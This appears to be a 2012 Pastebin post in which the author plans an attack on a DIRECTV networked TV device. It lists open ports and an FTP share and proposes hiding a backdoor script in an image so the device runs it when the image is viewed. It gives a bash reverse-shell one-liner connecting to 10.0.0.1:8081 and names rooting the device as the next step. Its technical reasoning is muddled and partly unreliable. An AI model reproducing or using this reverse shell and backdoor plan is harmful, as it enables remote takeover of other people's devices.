API tools faq
paste
Hex00010

[TV Hacking] DIRECT - Remote Keyboard - Apps - Hex00010

Hex00010
Jun 20th, 2012
415
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.42 KB | None | 0 0
raw download clone embed print report
  1. Re - Linking all of my old ' guest ' pastebins to one main account so i dont have to search for all of them through google
  2.  
  3.  
  4. Main PasteBin Link -> http://pastebin.com/VDcSTxdK
  5. -------------------------------------------------------------------------------------------------------
  6.  
  7.  
  8. [TV Hacking] DIRECTV
  9.  
  10. This is a exploitation method in order to gain access to DIRECTV's device in he networksharing center its defined as DIRECTV server and media
  11.  
  12. If you can understand everything i say below and can also help in the development of this much would be appreciated
  13.  
  14. Thanks
  15.  
  16.  
  17. http://[ SITE TAKEN DOWN ]
  18. -------------------------------------------------------------------------------------------------------
  19.  
  20.  
  21.  
  22.  
  23.  
  24. Hi guys in light of certain stuff that has happened to me in the past i am auditing my TV for certain reasons in doing so im going to just talk about my adventure in hacking the TV and providing what all i done - what happend - etc etc
  25.  
  26.  
  27.  
  28. First thing is first
  29.  
  30.  
  31. DIRECTV Media Share - Requires Media Sharing open on the network
  32.  
  33.  
  34.  
  35.  
  36. My auditing report may be diff than your's as i am targeting something specific
  37.  
  38.  
  39. DIRECTV allows the use of external applications to be ran on the device such as
  40.  
  41.  
  42. chrome , netflix , etc etc
  43.  
  44.  
  45. My main target here is NetFlix - What am i wanting to do?
  46.  
  47.  
  48. Im wanting to log all connections that are being sent out and being sent in to the device.
  49.  
  50.  
  51. Now What does DIRECTV Have Open
  52.  
  53. Port 5222
  54. Port 2121 - FTP Port ---Version uses OFTP
  55.  
  56.  
  57. OS: Linux
  58.  
  59.  
  60.  
  61. Hacking Methods:
  62.  
  63.  
  64. First thing i want to do is be able to see if i can output data to the TV Screen - Im trying to lookup more information on how the Applications are programmed and what not and see if i can just use the API for printing messages and include it into a script and see if it could execute on the screen
  65.  
  66.  
  67. Steps To do Such:
  68.  
  69. 1. We know that DIRECTV executes and writes data to files almost 24x7 - We are given FTP access however it is using the OFTP
  70.  
  71. OFTP runs on non root and is protected from system root commands also prevents from viewing the whole entire directory or directories
  72.  
  73. So what do we do now?
  74.  
  75.  
  76. Welll we know that the service is being ran off non root and we know that the folders structure is
  77.  
  78. Android
  79. Data
  80. Videos
  81. Pictures
  82. etc..... etc....
  83.  
  84. Well if we were to browse to the TV and go to my Pictures or videos and were to see pictures - What does that tell you?
  85.  
  86.  
  87.  
  88. 1. We can force the System to execute a script from the FTP service as root
  89.  
  90. Think about it
  91.  
  92.  
  93. We browse on the TV Screen
  94. Go to pictures
  95.  
  96.  
  97. ------
  98. While being at the computer you some how find a way to bind data to a image , video , etc etc and you place it in the FTP server
  99.  
  100. --------
  101.  
  102. now that your in the pictures screen - you now see your new image
  103.  
  104. you then select it
  105.  
  106. What happens?
  107.  
  108.  
  109. DIRECTV Executes the file - We also Binded a Backdoor to it
  110.  
  111. What exactly did this backdoor have in it?
  112.  
  113.  
  114. Well we know that the Linux Kernel that is being used is Linux 2.6.17 - 2.6.36
  115.  
  116. So we know also that DIRECTV uses Silverlight from Microsoft so we at least know it is using some standerd Microsoft Library/Include files
  117.  
  118. So we do have the possibility for creating a TCP Connection
  119.  
  120. We also know that it is using Linux
  121.  
  122. And what does Linux have that we all like as a hacker ?
  123.  
  124. the simple Back- Connect Reverse HTTP Send 1 Request
  125.  
  126. By using the :)
  127.  
  128. {bash -i >& /dev/tcp/10.0.0.1/8081 0>&1} #8080 is already in use - also i think this device runs WinRM also it has a xmpp-client as a service for port 5222 - still lookinh into that
  129.  
  130. So we add a .file-name ( in reality is SH/BASH etc etc )
  131.  
  132. Bind the file to the picture _ now remember we have a reverse back connect going on.
  133.  
  134.  
  135. After DIRECTV loads the image on screen you now have a Reverse Connection
  136.  
  137.  
  138. What next?
  139.  
  140.  
  141. Rooting the OS
  142.  
  143. We know that the OS is Linux 2.6.17 - 2.6.36 -
  144.  
  145.  
  146.  
  147. Now here is the part im going to have to do more research on - As its not just like simply rooting your ordinary linux system it requires much more then just that
  148.  
  149.  
  150. however i will update this thread as i go along
  151.  
  152.  
  153. If you guys have any suggestions or advice that you can help - Just tell me
  154.  
  155.  
  156.  
  157. Will Be updated Soon
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!